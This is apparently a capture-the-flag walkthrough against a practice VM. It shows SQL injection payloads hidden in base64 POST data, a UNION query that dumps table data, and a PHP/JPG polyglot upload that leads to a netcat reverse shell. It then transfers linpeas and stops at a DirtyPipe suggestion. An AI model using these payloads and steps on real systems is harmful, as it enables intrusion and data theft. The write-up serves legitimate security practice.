Download the VM and start it. It has a web application hosted which is configured to boot at start so you can put the VM in the background. Simply find the address of the application and start pentesting.
Challenge Goal : Find the file flag.txt and read its content.
First we start by finding the IP of machine here i used the netdiscover command.
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $sudo netdiscover -r 192.168.1.12/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.4 **:**:**:**:**:** 1 60 CHONGQING FUGUI ELECTRONICS
192.168.1.1 **:**:**:**:**:** 1 60 Syrotech Networks. Ltd.
192.168.1.5 **:**:**:**:**:** 1 60 Intel Corporate
192.168.1.21 **:**:**:**:**:** 1 60 Intel Corporate
here 192.168.1.1 is ip of router.
we scane the IP 192.168.1.5,192.168.1.21 and the IP 192.168.1.21 have web service running at port 42710.
I use rustscan for port scaning in CTFs because it is insanely fast.
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $rustscan -a 192.168.1.21
File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.
Open 192.168.1.21:42710
Starting Script(s)
Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
...
opening this website we have nothing but this page:
First though was to look for robots.txt file but no luck so i did directory bruteforcing with gobuster.
ID, Name, Roll, Marks it looks like it is fetching this data from sql database so lets try SQL injection.
this POST request have data=NjIxNzI5NTgx it base64 encoded value of 621729581.
lets try with simple payload ' OR 1=1 # but it is not working after few tries i tried 621729581 OR 1=1 base64 encode and it gives us all the entries hooray, and that is successful SQL injection.
payload=
data=<@base64>621729581 OR 1=1<@/base64>
<-- I'm using Hackvertor burp extension.
we know the number of columns it is 4 : ID, Name, Roll, Marks.So the payload for union attack would be:
payload:
data=<@base64>621729581 UNION SELECT NULL, NULL, NULL, NULL<@/base64>
It gives us the result in response so payload is correct and we also know the data types it should be Integer for ID, Roll, Marks and String for Name so we can put this values in payload.
payload:
data=<@base64>621729581 UNION SELECT 1, "name", 2, 3<@/base64>
response:
Now we can try to extract the databases'name, tables'name, columns'name.
so we can only upload jpg file but how it is checking for file type extension? let's do one experiment rename the jpg file to php if error it is looking for extension and if successful it is checking MIME type.
Record updated successfullyThe file has been uploaded
so MIME type it is.
We have to create polyglot PHP/JPG payload. how i do it is open jpg file and append php payload at last so let's create simple.php payload.
Record updated successfullyThe file has been uploaded and file is uploaded successfully but where ?
we have column name profile_picture in users table, if you remember that we still have SQLi.
payload=
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,profile_picture,0x7c), 2, 3 fRoM users<@/base64>
result = |../assets/uploads/simple.php|
so our file is at http://192.168.1.21:42710/assets/uploads/simple.php
and path= http://192.168.1.21:42710/assets/uploads/revshell.php
on visiting this file we have reverse shell:
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.12] from (UNKNOWN) [192.168.1.21] 38442
Linux heathrow-VirtualBox 5.11.0-16-generic #17-Ubuntu SMP Wed Apr 14 20:12:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
23:44:47 up 2:01, 1 user, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
heathrow tty2 tty2 21:32 2:12m 0.03s 0.03s /usr/libexec/gnome-session-binary --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (732): Inappropriate ioctl for device
bash: no job control in this shell
www-data@heathrow-VirtualBox:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@heathrow-VirtualBox:/$
We have shell but we can't access /home/heathrow we need to escalate our privilege. first thing that comes in mind is linpeas.sh let's move that to victim machine i create local server with python python -m http.server 80, to transfer file because we normally don't have internet access in victim machine.
change permissions to +x : chmod +x linpeas.sh
Now run the file: ./linpeas.sh
Analyzing the output we have first suggestion for [CVE-2022-0847] DirtyPipe:
